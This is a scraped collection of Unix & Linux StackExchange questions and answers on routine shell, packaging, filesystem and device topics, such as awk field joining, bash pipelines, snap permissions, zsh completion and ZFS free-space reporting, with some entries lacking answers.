580,276
With sudden working from home, video conferencing is all the rage, and many of the more fun features are built into only the Windows clients, such as background blur, changing background images, filters, turning yourself into a potato, etc. I realize it's not exactly business critical, but it adds to the camaraderie, and I've been feeling left out. How can I add features like this to my Linux system? Note, I don't have the option of changing clients/services. I'm looking for a solution that creates some sort of virtual camera device I can select from any conferencing application.
I have made a Linux package, weffe, for some basic video effects using ffmpeg on Linux webcams, here: https://github.com/intermezzio/weffe . You can add a foreground image (like a frame), add top and bottom meme text, or stream a prerecorded video to a webcam, and use a couple of other features. It's very fast because it's written 100% in the shell, without any additional programming languages. However, if you're looking for something with more features, here are a couple of programs you can consider (including those from rriemann's comment):

- Avatarify: make yourself talk with a fake image (like Mona Lisa) and words will come out of its mouth (using Python + Tensorflow, can be run on the cloud with CoLab)
- Pyfakewebcam: Python library for writing videos to a fake webcam device
- Linux Fake Background Webcam: use a virtual background on Linux (written in Python + OpenCV)
- Open Source Virtual Background: another virtual background program (also written in Python + OpenCV)
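As a minimal sketch of the mechanism most of these tools share (assuming the v4l2loopback kernel module is available; the device number and filter are illustrative, not part of the answer above), you can create a virtual camera and feed it a filtered stream with ffmpeg:

    # Load the loopback module to create /dev/video2 (number is an assumption)
    sudo modprobe v4l2loopback video_nr=2 card_label="VirtualCam"

    # Read the real webcam, blur it, and write it to the virtual device,
    # which conferencing apps can then select as a camera
    ffmpeg -f v4l2 -i /dev/video0 -vf "boxblur=10" -f v4l2 /dev/video2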
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580276", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/1069/" ] }
580,357
I got a new drive and I can copy files fine with simple cp on the drive. However, for some weird reason I get Permission denied with ffmpeg. Permissions seem fine unless I'm missing something:

    > ll /media/manos/6TB/
    drwxrwxrwx 13 manos      4096 Apr 16 00:56 ./
    drwxr-x---+ 6 manos      4096 Apr 16 00:49 ../
    -rwxrwxrwx  1 manos 250900209 Apr 15 17:28 test.mp4*

But ffmpeg keeps complaining:

    > ffmpeg -i test.mp4 test.mov
    ffmpeg version n4.1.4 Copyright (c) 2000-2019 the FFmpeg developers
      built with gcc 7 (Ubuntu 7.4.0-1ubuntu1~18.04.1)
      configuration: --prefix= --prefix=/usr --disable-debug --disable-doc --disable-static --enable-avisynth --enable-cuda --enable-cuvid --enable-libdrm --enable-ffplay --enable-gnutls --enable-gpl --enable-libass --enable-libfdk-aac --enable-libfontconfig --enable-libfreetype --enable-libmp3lame --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libopus --enable-libpulse --enable-sdl2 --enable-libspeex --enable-libtheora --enable-libtwolame --enable-libv4l2 --enable-libvorbis --enable-libvpx --enable-libx264 --enable-libx265 --enable-libxcb --enable-libxvid --enable-nonfree --enable-nvenc --enable-omx --enable-openal --enable-opencl --enable-runtime-cpudetect --enable-shared --enable-vaapi --enable-vdpau --enable-version3 --enable-xlib
      libavutil      56. 22.100 / 56. 22.100
      libavcodec     58. 35.100 / 58. 35.100
      libavformat    58. 20.100 / 58. 20.100
      libavdevice    58.  5.100 / 58.  5.100
      libavfilter     7. 40.101 /  7. 40.101
      libswscale      5.  3.100 /  5.  3.100
      libswresample   3.  3.100 /  3.  3.100
      libpostproc    55.  3.100 / 55.  3.100
    test.mp4: Permission denied

Simply copying like below works fine:

    > cp test.mp4 test.mp4.bak
    'test.mp4' -> 'test.mp4.bak'

Any ideas on what is going on? This is pretty annoying. Note ffmpeg is installed at /snap/bin/ffmpeg
So after a lot of digging I figured the issue is with the snap package manager. Apparently by default, snap can't access the media directory, so we need to manually fix this. Check if ffmpeg has access to removable-media like below:

    > snap connections | grep ffmpeg
    desktop          ffmpeg:desktop          :desktop          -
    home             ffmpeg:home             :home             -
    network          ffmpeg:network          :network          -
    network-bind     ffmpeg:network-bind     :network-bind     -
    opengl           ffmpeg:opengl           :opengl           -
    optical-drive    ffmpeg:optical-drive    :optical-drive    -
    pulseaudio       ffmpeg:pulseaudio       :pulseaudio       -
    wayland          ffmpeg:wayland          :wayland          -
    x11              ffmpeg:x11              :x11              -

Add that permission if it's missing:

    sudo snap connect ffmpeg:removable-media
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/580357", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/12217/" ] }
580,575
Let's say I have two bash scripts:

Provider.sh, which performs some process and needs to "expose" MAP, but not A or B:

    #!/bin/bash
    declare -A MAP
    A=hello
    B=world
    MAP[hello]=world

Consumer.sh, which executes Provider.sh and needs to use MAP:

    #!/bin/bash
    source ./Provider.sh
    echo ${MAP[hello]} # >>> world

In order to declutter the environment as much as possible, I want as little as possible in Provider.sh to be visible to Consumer.sh. How can I make it so that only MAP is "sourced"?
It is possible to scope variables using functions. Example:

    ## Provider.sh

    # Global vars
    declare -A map

    # Wrap the rest of Provider.sh in a function
    provider() {
        # Local vars only available in this function
        declare a=hello b=world c d

        # Global vars are available
        map[hello]=world
    }
    provider "$@" # Execute function, pass on any positional parameters

    # Remove function
    unset -f provider

    $ cat Consumer.sh
    . ./Provider.sh
    echo "${map[hello]}"
    echo "$a"

    $ bash -x Consumer.sh
    + . ./Provider.sh
    ++ declare -A map
    ++ provider
    ++ declare a=hello b=world c d
    ++ map[hello]=world
    ++ unset -f provider
    + echo world
    world
    + echo ''
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580575", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/406806/" ] }
580,715
I want to copy some files from the root partition (/var/log/) to my home directory (/home/test/copyoflogfiles/) and after that I want to remove those files from /var/log/. The files I want to copy are situated under /var/log/. The root partition is filling up, so I want to remove the following files from there:

    btmp-20200401   >> 894M
    secure-20200322 >> 187M
    secure-20200329 >> 235M
    secure-20200405 >> 180M
    secure-20200412 >> 119M

I have created a directory under home to have a backup of those files, so that I have them just in case. The full path of the new directory is '/home/test/copyoflogfiles/'. I am a new learner. I want to ask:

1. Is the following command correct if I want to copy btmp-20200401 from /var/log to /home/test/copyoflogfiles/? If not, what will be the correct command?

    cp /var/log/btmp-20200401 /home/test/copyoflogfiles/

2. What will be my current directory when I perform the copy command? Suppose I am inside /home/test/copyoflogfiles/. In that case, will the command be different?

3. Can you please tell me what the command is for deleting a single file from the directory? I want to remove the file btmp-20200401 from /var/log/ after copying that file.

Kind regards
Question 1: your command is correct:

    cp /var/log/btmp-20200401 /home/test/copyoflogfiles/

If you do not have the file system privileges to copy the file, then the sudo command can be used to elevate your permissions, for example:

    sudo cp /var/log/btmp-20200401 /home/test/copyoflogfiles/

Question 2: You can use the cp command from any directory to any other directory if you are using full paths, so you could run that command from any other directory.

Question 3:

    rm /var/log/btmp-20200401

would remove that file. To be sure, you could use rm -i filename, which will prompt you to confirm the correct file. However, it might be better to use the mv command rather than cp followed by rm, so your command would change to:

    mv /var/log/btmp-20200401 /home/test/copyoflogfiles/

which moves the file rather than copying and deleting.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580715", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/392731/" ] }
580,732
I have a file like this:

    head 1kG_MDS6.bim
    1 rs2073813 0 753541 A G
    1 rs60320384 0 769223 G C
    1 rs59066358 0 771967 A G
    ...

I would like to concatenate the 1st, 4th, 6th and 5th columns (in that order), separated by ":", so the output would look like this:

    1:753541:G:A
    1:769223:C:G
    1:771967:G:A

I tried this:

    awk ' { print $1 $4 $6 $5 ":" $NF } ' 1kG_MDS6.bim > 1kG_MDS6_SNPs1.txt

but it concatenated with ":" just the last two columns.
Use an output field separator:

    awk 'BEGIN{OFS=":"} {print $1,$4,$6,$5}' file

Output:

    1:753541:G:A
    1:769223:C:G
    1:771967:G:A
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580732", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/401868/" ] }
581,058
I'm running BOINC on my old netbook, which only has 2 GB of RAM onboard, which isn't enough for some tasks to run. As in, they refuse to, seeing how low on RAM the device is. I have zRAM with backing_dev and the zstd algorithm enabled, so in reality, lack of memory is never an issue, and in especially tough cases I can always just use systemd-run --scope -p (I have successfully run programs that demanded 16+ GB of RAM using this). How can I make BOINC think that my laptop has more than 2 GB of RAM installed, so that I could run those demanding tasks?
Create a fake meminfo and mount it over the original /proc/meminfo:

    $ mkdir fake-meminfo && cd fake-meminfo
    $ cp /proc/meminfo .
    $ chmod +w meminfo
    $ sed -Ei 's,^MemTotal: [0-9]+ kB,MemTotal: 8839012 kB,' meminfo # replace 8839012 with the amount of RAM you want to pretend you have
    $ free -m # check how much RAM you have now
                  total        used        free      shared  buff/cache   available
    Mem:           7655        1586        3770         200        2298        5373
    $ sudo mount --bind meminfo /proc/meminfo
    $ free -m # check how much RAM you pretend to have after replacing /proc/meminfo
                  total        used        free      shared  buff/cache   available
    Mem:           8631        2531        3800         201        2299        5403
    $ sudo umount /proc/meminfo # restore the original /proc/meminfo
    $ free -m
                  total        used        free      shared  buff/cache   available
    Mem:           7655        1549        3806         200        2299        5410

You can also run the above commands in a mount namespace isolated from the rest of the system.

References: Recover from faking /proc/meminfo
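As a sketch of the mount-namespace variant mentioned above (the path and the boinc-client invocation are assumptions; substitute whatever starts your BOINC client), unshare confines the bind mount to one process tree:

    # Only processes started inside this shell see the fake meminfo
    sudo unshare --mount sh -c '
        mount --bind /path/to/fake-meminfo/meminfo /proc/meminfo  # hypothetical path
        free -m            # shows the pretended total
        exec boinc-client  # assumption: your BOINC startup command
    '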
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/581058", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/405442/" ] }
581,144
Bash 4.3 shell on Linux Mint: I realize the Bash shell is type-less, or has a very weak form of typing. But can the Bash shell be invoked (e.g. with some option) such that the shell will throw a run-time error when a declared integer variable is misused (e.g. by attempting to store a string into that integer variable)? Example code:

    declare -i age
    age=23
    echo "$age" # result is 23
    age="hello"
    echo "$age" # result is not the string hello - wish I could get an error message here!
The way to throw an error is:

    set -u
    # or
    set -o nounset

Then:

    $ set -u
    $ declare -i age
    $ age=hello
    bash: hello: unbound variable

However it won't always "work" the way you expect if it's not an unbound variable:

    $ hello=world
    $ age=hello
    bash: world: unbound variable
    $ hello=42
    $ age=hello
    $ echo $age
    42
    $ hello=""
    $ age=hello
    $ echo $age
    0

I've come to think there's very little value in declare -i. It lets you do arithmetic without arithmetic syntax, and I think that just adds a layer of confusion.
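If the goal is simply to reject non-numeric input outright, a common alternative to declare -i is explicit validation; this is a minimal sketch (the function name is mine, not from the answer):

    # Return success only for optionally-signed decimal integers
    is_int() {
        [[ $1 =~ ^[+-]?[0-9]+$ ]]
    }

    read -r age
    is_int "$age" || { echo "error: '$age' is not an integer" >&2; exit 1; }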
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581144", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/139928/" ] }
581,284
How do I install Microsoft Teams via pacman on Arch Linux? Microsoft Teams is also available for Linux, but I'm having trouble finding an easy installation route for Arch; Teams is not listed in the official pacman repositories. I found only DEB and RPM packages on the official Microsoft download page: https://products.office.com/en-us/microsoft-teams/download-app
a) Using makepkg to build and install the package

Clone the teams Arch git repository (PKGBUILD):

    git clone https://aur.archlinux.org/teams.git

Build the package using makepkg and install it using the -si option:

    makepkg -si

See also: https://aur.archlinux.org/packages/teams/

b) Alternatively, use yay as a package manager to easily install AUR packages.

If yay is not installed:

    git clone https://aur.archlinux.org/yay.git
    cd yay
    makepkg -si

Use yay to install the AUR package:

    yay -S teams
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/581284", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/364144/" ] }
581,290
I have a bunch of files like this: hhsLog.8020.20200330}1585594173}0}coll_DefaultCollectorGroup_1_158594166_132642}1036942}0}0 I just want to keep the first 20 characters and add a .txt extension. So in the end I should have a file with the name: hhsLog.8020.20200330.txt I am working on both Fedora and Solaris.
You can easily do this with a shell loop in bash:

    cd /path/to/files/
    for file in *; do
        echo mv -i -- "$file" "${file:0:20}.txt"
    done

Once you are satisfied that does what you need, remove the echo to actually rename the files:

    cd /path/to/files/
    for file in *; do
        mv -i -- "$file" "${file:0:20}.txt"
    done

The -i will make mv ask before overwriting if one of the new names already exists.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581290", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/407515/" ] }
581,388
I have a file like this:

    head logistic_results.assoc_3.logistic
    CHR              SNP         BP A1 TEST NMISS     OR   STAT         P
      2  2:129412140:T:C  129412140  C  ADD  1438  1.523   3.89 0.0001004
     15  15:26411414:G:A   26411414  A  ADD  1438 0.5577 -3.889 0.0001005
      7   7:24286442:T:G   24286442  G  ADD  1438 0.7449 -3.889 0.0001007
      7   7:24286638:G:C   24286638  C  ADD  1438 0.7449 -3.889 0.0001007
      2  2:129403636:T:C  129403636  C  ADD  1438  1.741  3.889 0.0001008
     15  15:70363332:A:G   70363332  G  ADD  1438  1.366  3.886  0.000102
      3   3:13698784:G:A   13698784  A  ADD  1438  1.465  3.884 0.0001028
      3   3:32665882:C:A   32665882  A  ADD  1438   1.54  3.883  0.000103
     12  12:32855080:A:G   32855080  G  ADD  1438  4.013  3.883 0.0001031

How do I extract all lines which have 3 in the first column? I tried this but I got an empty file:

    grep '^3' logistic_results.assoc_3.logistic > logistic_results.assoc_3.logistic_chr3
    awk '/^3/' logistic_results.assoc_3.logistic > logistic_results.assoc_3.logistic_chr3

For this example the result would be this:

      3   3:13698784:G:A   13698784  A  ADD  1438  1.465  3.884 0.0001028
      3   3:32665882:C:A   32665882  A  ADD  1438   1.54  3.883  0.000103
Compare the first non-whitespace field with the string 3:

    awk '$1 == "3"' logistic_results.assoc_3.logistic >logistic_results.assoc_3.logistic_chr3

The issue with your commands is that you're expecting the 3 to be the first character on the line, but judging from your sample data, there may be whitespace in front of the number. Using awk with its default field delimiter would place the chromosome name in $1 regardless of leading whitespace characters. This would also be safer, as $1 == "1" would only be true for chromosome 1, whereas a regular expression matching 1 at the start of the field (e.g. with /^[[:blank:]]*1/ or $1 ~ /^1/) would also match e.g. 11 and 12.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581388", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/401868/" ] }
581,507
What is the difference between this redirection

    some-program &> some_file

and this one?

    some-program > some_file 2>&1
In the bash and zsh shells, there is no difference between the two. The &>file redirection is syntactic sugar implemented as an extension to the POSIX standard that means exactly the same thing as the standard >file 2>&1.

Note that using the &> redirection in a script executed by a non-bash/zsh interpreter will likely break your script in interesting ways, as & and > would be interpreted independently of each other:

    some_command &>file

would, in a non-bash/zsh script, be the same as

    some_command & >file

This starts some_command as a background job, and truncates/creates the file called file.

Also related: What are the shell's control and redirection operators?
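A quick way to observe the difference, assuming dash is available as a strictly POSIX shell (the filename is illustrative, and the exact interleaving may vary since the backgrounded echo races with the next command):

    $ bash -c 'echo hi &> out.txt'; wc -c out.txt
    3 out.txt
    $ dash -c 'echo hi &> out.txt'; wc -c out.txt
    hi
    0 out.txt

In the dash case, "hi" came from the backgrounded echo writing to the terminal, while out.txt was merely truncated and left empty.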
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581507", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/270159/" ] }
581,545
I understand these:

    true; echo "$?"   # 0
    false; echo "$?"  # 1
    true | echo "$?"  # 0

But not this:

    false | echo "$?" # 0

...Why doesn't it print 1? And how could I force a failure in a pipe, and get 1 thereafter?
The result of both true | echo "$?" and false | echo "$?" is misleading. The content of "$?" will be set before piping the command false to the command echo. To execute these lines, bash sets up a pipeline of commands. The pipeline is set up, then the commands started in parallel. So in your example:

    true;  echo "$?" # 0
    false; echo "$?" # 1
    true | echo "$?" # 0

is the same as:

    true
    echo "$?" # 0
    false
    echo "$?" # 1
    echo "$?" # 0

true is not executed before echo "$?"; it is executed at the same time.
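To address the second half of the question (getting the failure after the pipe), bash keeps per-command statuses in the PIPESTATUS array, and set -o pipefail makes the pipeline's own exit status reflect the failure; a short sketch:

    $ false | true
    $ echo "${PIPESTATUS[@]}"   # exit status of each command in the last pipeline
    1 0
    $ set -o pipefail
    $ false | true
    $ echo "$?"                 # now the pipeline as a whole reports the failure
    1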
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/581545", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/291147/" ] }
581,571
I have Debian 10 and installed wine5 using:

    sudo apt install --install-recommends winehq-stable

I get these errors when I try to run Notepad++:

    0009:fixme:font:get_outline_text_metrics failed to read full_nameW for font L"Ani"!
    0009:fixme:win:LockWindowUpdate (0x1004e), partial stub!
    0009:fixme:imm:ImmReleaseContext (000100F0, 0110C888): stub
    0009:fixme:win:LockWindowUpdate ((nil)), partial stub!
    0009:fixme:msg:ChangeWindowMessageFilterEx 0x1004e 4a 1 (nil)
    0009:fixme:win:LockWindowUpdate (0x1004e), partial stub!
    0009:fixme:win:LockWindowUpdate ((nil)), partial stub!
    0009:fixme:ver:GetCurrentPackageId (0x32fe94 (nil)): stub

I think I need to install something else, but I don't know what.

    sudo apt list --installed | grep wine

shows

    fonts-wine/stable,stable,now 4.0-2 all [installed]
    wine-stable-amd64/unknown,now 5.0.0~buster amd64 [installed,automatic]
    wine-stable-i386/unknown,now 5.0.0~buster i386 [installed,automatic]
    wine-stable/unknown,now 5.0.0~buster amd64 [installed,automatic]
    winehq-stable/unknown,now 5.0.0~buster amd64 [installed]

wine version:

    wine --version
    wine-5.0

If I run winecfg, I get:

    wine: Read access denied for device L"\\??\\Z:\\", FS volume label and serial are not available.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/581571", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/82788/" ] }
581,632
I'm learning to write zsh completion scripts and while reading the documentation for _arguments I found this part:

    n:message:action
    n::message:action

    This describes the n'th normal argument. The message will be printed above the matches generated and the action indicates [...]

Where is that message printed? I'm trying with the following minimal function but I can't figure it out. Do I need to enable something in my shell?

    function _test {
        _arguments '-a' '-b[description]:my message:(x y)'
    }

    $ compdef _test program

This results in:

    $ program -b <tab>
    x y
It's in the manual if you know where to look, but the way it's explained, you practically have to know the answer to understand what the manual is saying. _arguments calls this a "message" and the manual says that this "describes". So you take a leap of faith, or read the source code of _arguments, and puzzle out that this message is passed to _describe. The documentation of that function states that

    The descr is taken as a string to display above the matches if the format style for the descriptions tag is set.

A style is something you configure with zstyle. The section "Completion System Configuration" documents the format of styles for completion: the fields are always in the order

    :completion:function:completer:command:argument:tag

So you need to call zstyle ':completion:*:*:*:*:descriptions' format SOMETHING, or replace the * by something else if you only want to do it in certain contexts.

The documentation of the descriptions tag is not particularly helpful at this stage, but the documentation of the format style is:

    If this is set for the descriptions tag, its value is used as a string to display above matches in completion lists. The sequence %d in this string will be replaced with a short description of what these matches are. This string may also contain the output attribute sequences understood by compadd -X.

See the compadd documentation, which in turn refers to prompt expansion; you can mainly use visual effects. So run

    zstyle ':completion:*:*:*:*:descriptions' format '%F{green}%d%f'

and you'll see that message in green above the completions. Or

    zstyle ':completion:*:*:program:*:descriptions' format '%F{green}%d%f'

if you only want it to apply when completing arguments of program.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581632", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/7004/" ] }
581,763
Here is an example where backticks and $() behave differently:

    $ echo "$(echo \"test\")"
    "test"
    $ echo "`echo \"test\"`"
    test

My understanding was this is because "backslashes (\) inside backticks are handled in a non-obvious manner". But it seems like this is something else, because when I remove the outer double quotes the results become similar:

    $ echo $(echo \"test\")
    "test"
    $ echo `echo \"test\"`
    "test"

Could someone explain to me how it works and why "`echo \"test\"`" removes double quotes?
You are right, it is something else in this case. The solution is still in the same link, but the second point:

    Nested quoting inside $() is far more convenient. [...] `...` requires backslashes around the internal quotes in order to be portable.

Thus, echo "`echo \"test\"`" does not equal this:

    echo "$(echo \"test\")"

but this:

    echo "$(echo "test")"

You need to compare it instead with this:

    echo "`echo \\"test\\"`"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581763", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/6988/" ] }
581,801
I am currently running a statistical modelling script that performs a phylogenetic ANOVA. The script runs fine when I analyse the full dataset, but when I take a subset it starts analysing and then quickly terminates with a segmentation fault. I cannot really figure out by googling whether this could be due to a problem on my side (e.g. a sample dataset too small for the analysis) and/or a bug in the script, or whether this has something to do with my Linux system. I read it has to do with writing data to memory, but then why is everything fine with a larger dataset? I tried to find more information using Google, but this made it more complicated. Thanks for clarifying in advance!
(tl;dr: It's almost certainly a bug in your program or a library it uses.)

A segmentation fault indicates that a memory access was not legal. That is, based on the issued request, the CPU issues a page fault because the page requested either isn't resident or has permissions that are incongruous with the request. After that, the kernel checks to see whether it simply doesn't know anything about this page, whether it's just not in memory yet and it should put it there, or whether it needs to perform some special handling (for example, copy-on-write pages are read-only, and this valid page fault may indicate we should copy it and update the permissions). See Wikipedia for minor vs. major (e.g. demand paging) vs. invalid page faults.

Getting a segmentation fault indicates the invalid case: the page is not only not in memory, but the kernel also doesn't have any remediative actions to perform because the process doesn't logically have that page of its virtual address space mapped. As such, this almost certainly indicates a bug in either the program or one of its underlying libraries -- for example, attempting to read or write into memory which is not valid for the process. If the address had happened to be valid, it could have caused stack corruption or scribbled over other data, but reading or writing an unmapped page is caught by hardware.

The reason why it works with your larger dataset and not your smaller dataset is entirely specific to that program: it's probably a bug in that program's logic, which is only tripped for the smaller dataset for some reason (for example, your dataset may have a field representing the total number of entries, and if it's not updated, your program may blindly read into unallocated memory if it doesn't do other sanity checks).

It's several orders of magnitude less likely than simply being a software bug, but a segmentation fault may also be an indicator of hardware issues, like faulty memory, a faulty CPU, or your hardware tripping over errata (as an example, see here). Getting segfaults due to failing hardware often results in sometimes-works behaviour, although a bad bit in physical RAM might get mapped the same way in repeated runs of a program if you don't run anything else in between. You can mostly rule out this possibility by booting memtest86+ to check for failing RAM, and by using software like Prime95 to stress-test your CPU (including the FP math FMA execution units).

You can run the program in a debugger like gdb and get the backtrace at the time of the segmentation fault, which will likely indicate the culprit:

    % gdb --args ./foo --bar --baz
    (gdb) r    # run the program
    [...wait for segfault...]
    (gdb) bt   # get the backtrace for the current thread
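If the crash is hard to reproduce under a live debugger, an alternative sketch is to capture a core dump and inspect it after the fact (the paths are illustrative; on systemd machines, coredumpctl may manage the dumps instead of a local core file):

    $ ulimit -c unlimited    # allow core files in this shell
    $ ./foo --bar --baz      # run until it segfaults
    Segmentation fault (core dumped)
    $ gdb ./foo core         # load the dump; then use "bt" as above
    $ coredumpctl gdb foo    # alternative on systemd systems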
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/581801", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/403558/" ] }
581,867
I'm using a Logitech C720 webcam with my PC, which runs Devuan Beowulf GNU/Linux (~= Debian 10 Buster but without systemd). In a related, but not Linux-specific, question on SuperUser , it turns out that I need to change my webcam's power line frequency setting. However - I have no idea how to do that. My desktop environment, Cinnamon, does not have an item in the "System Settings" dialog for it. How do I make this setting, then?
On the command line, you can set the uvcvideo driver's power line frequency setting to the 50 Hz value with:

    v4l2-ctl --set-ctrl=power_line_frequency=1

If your webcam is not /dev/video0, add a -d /dev/videoN option with the correct number. The v4l2-ctl command comes in package v4l-utils, at least on Debian and related distributions.

Also, v4l2-ctl -L will display a list of settings available in your webcam. It will also describe the available choices for settings like power line frequency. Your webcam may have a list of available settings that is different from mine.

To make the power line frequency setting persistent, you might want to make a udev rule of it. To do that, create a file named /etc/udev/rules.d/81-uvcvideo.rules with the following contents:

    # Set power line frequency to European
    ACTION=="add", SUBSYSTEM=="video4linux", DRIVERS=="uvcvideo", RUN+="/usr/bin/v4l2-ctl --set-ctrl=power_line_frequency=1"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581867", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34868/" ] }
581,878
I've been taking some time to learn more about Linux, and I've chosen Debian Buster as my main 'lab'. One thing to highlight: it's a Debian VM on Oracle VirtualBox, with the network set as 'bridged'. The problem is: I want to work with a static IP, but though I've configured everything according to my network parameters, the interface won't come up (I checked journalctl -xe, and it brings a failure message). Under DHCP it works just fine. Some help would be much appreciated. Regards.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581878", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408100/" ] }
581,883
I have the following Makefile:

    $ cat Makefile
    all: foo

    foo: bar
        @true

    bar: file.txt
        touch file.txt

    file.txt:
        @echo 'Created file.txt'

    run:
        @echo 'Target without dependency.'
    $

When I execute make, then touch file.txt is always executed, even when file.txt already exists. Why is that so? I expected the bar target not to run if its dependency is met, i.e. file.txt exists. In addition, am I correct that make by default picks the first target of the Makefile, which is named all in my example?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581883", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/33060/" ] }
582,005
If I use zpool to list the available space, it tells me I have over 270 GB free, yet the actual free space available (and shown by df and zfs list) is only a mere 40 GB, almost ten times less:

    $ zpool list
    NAME      SIZE  ALLOC   FREE  CKPOINT  EXPANDSZ   FRAG    CAP  DEDUP  HEALTH  ALTROOT
    ssdtank  7.25T  6.98T   273G        -         -    21%    96%  1.00x  ONLINE  -

    $ zpool iostat -v
                                          capacity     operations     bandwidth
    pool                                alloc   free   read  write   read  write
    ----------------------------------  -----  -----  -----  -----  -----  -----
    ssdtank                             6.98T   273G      1     15   365K   861K
      ata-Samsung_SSD_860_QVO_4TB_S123  3.49T   136G      0      7   182K   428K
      ata-Samsung_SSD_860_QVO_4TB_S456  3.49T   137G      0      8   183K   434K

    $ zfs list
    NAME      USED  AVAIL  REFER  MOUNTPOINT
    ssdtank  6.98T  40.6G    32K  /srv/tank

What does this discrepancy mean? Why do the two utilities show differing amounts of free space? More importantly, how can I access the "extra" 200 GB if it's really there?

The pool is made of two identical disks, no RAID or other setups, just added as plain vdevs to the pool and the filesystem created on top. (There are multiple filesystems inside the root one shown, but I don't think they are relevant because they all share the same root and have the same 40.6G free space.)

As requested, here is the output of zfs get all. (I also updated the figures above so they all make sense, as the amount of free disk space has changed today. The old figures were 257GB/27GB and today they are 273GB/40GB, which means the amount of disk space freed up since I originally posted the question has increased both figures by the same amount - i.e. zpool seems to be reporting approx 270 GB more than everything else, but it's consistently 270 GB more than whatever the actual free space happens to be at the time.)

    NAME     PROPERTY              VALUE                  SOURCE
    ssdtank  aclinherit            restricted             default
    ssdtank  acltype               off                    default
    ssdtank  atime                 off                    received
    ssdtank  available             40.6G                  -
    ssdtank  canmount              on                     default
    ssdtank  casesensitivity       sensitive              -
    ssdtank  checksum              on                     default
    ssdtank  compression           off                    default
    ssdtank  compressratio         1.00x                  -
    ssdtank  context               none                   default
    ssdtank  copies                1                      default
    ssdtank  createtxg             1                      -
    ssdtank  creation              Sat Oct 26 21:53 2019  -
    ssdtank  dedup                 off                    default
    ssdtank  defcontext            none                   default
    ssdtank  devices               on                     default
    ssdtank  dnodesize             legacy                 default
    ssdtank  encryption            off                    default
    ssdtank  exec                  on                     default
    ssdtank  filesystem_count      none                   default
    ssdtank  filesystem_limit      none                   default
    ssdtank  fscontext             none                   default
    ssdtank  guid                  12757787786185470931   -
    ssdtank  keyformat             none                   default
    ssdtank  keylocation           none                   default
    ssdtank  logbias               latency                default
    ssdtank  logicalreferenced     16K                    -
    ssdtank  logicalused           6.98T                  -
    ssdtank  mlslabel              none                   default
    ssdtank  mounted               yes                    -
    ssdtank  mountpoint            /srv/tank              local
    ssdtank  nbmand                off                    default
    ssdtank  normalization         none                   -
    ssdtank  objsetid              54                     -
    ssdtank  overlay               off                    default
    ssdtank  pbkdf2iters           0                      default
    ssdtank  primarycache          all                    default
    ssdtank  quota                 none                   default
    ssdtank  readonly              off                    default
    ssdtank  recordsize            128K                   default
    ssdtank  redundant_metadata    all                    default
    ssdtank  refcompressratio      1.00x                  -
    ssdtank  referenced            32K                    -
    ssdtank  refquota              none                   default
    ssdtank  refreservation        none                   default
    ssdtank  relatime              off                    default
    ssdtank  reservation           none                   default
    ssdtank  rootcontext           none                   default
    ssdtank  secondarycache        all                    default
    ssdtank  setuid                on                     default
    ssdtank  sharenfs              [email protected]/24  received
    ssdtank  sharesmb              off                    default
    ssdtank  snapdev               hidden                 default
    ssdtank  snapdir               hidden                 default
    ssdtank  snapshot_count        none                   default
    ssdtank  snapshot_limit        none                   default
    ssdtank  special_small_blocks  0                      default
    ssdtank  sync                  standard               default
    ssdtank  type                  filesystem             -
    ssdtank  used                  6.98T                  -
    ssdtank  usedbychildren        6.98T                  -
    ssdtank  usedbydataset         32K                    -
    ssdtank  usedbyrefreservation  0B                     -
    ssdtank  usedbysnapshots       0B                     -
    ssdtank  utf8only              off                    -
    ssdtank  version               5                      -
    ssdtank  volmode               default                default
    ssdtank  vscan                 off                    default
    ssdtank  written               0                      -
    ssdtank  xattr                 on                     default
    ssdtank  zoned                 off                    default
Internally, ZFS reserves a small amount of space (slop space) to ensure some critical ZFS operations can complete even in situations with very low free space. The amount is 3.2% of total pool capacity (as of zfs-0.6.5):

    3.2% of 7.25T = 235GB

You really only have 40.6GB free in the filesystem. zpool reports the raw disk capacities, and its free space will be 40 + 235 = 275G.
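On OpenZFS on Linux, that reservation is derived from the spa_slop_shift module parameter (pool size divided by 2^spa_slop_shift, i.e. 1/32, roughly 3.2%, by default), which you can inspect; a quick check, assuming the zfs module is loaded:

    $ cat /sys/module/zfs/parameters/spa_slop_shift
    5
    $ # 7.25 TiB / 2^5 = 0.227 TiB, roughly the 235 GB discrepancy above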
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582005", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/6662/" ] }
582,024
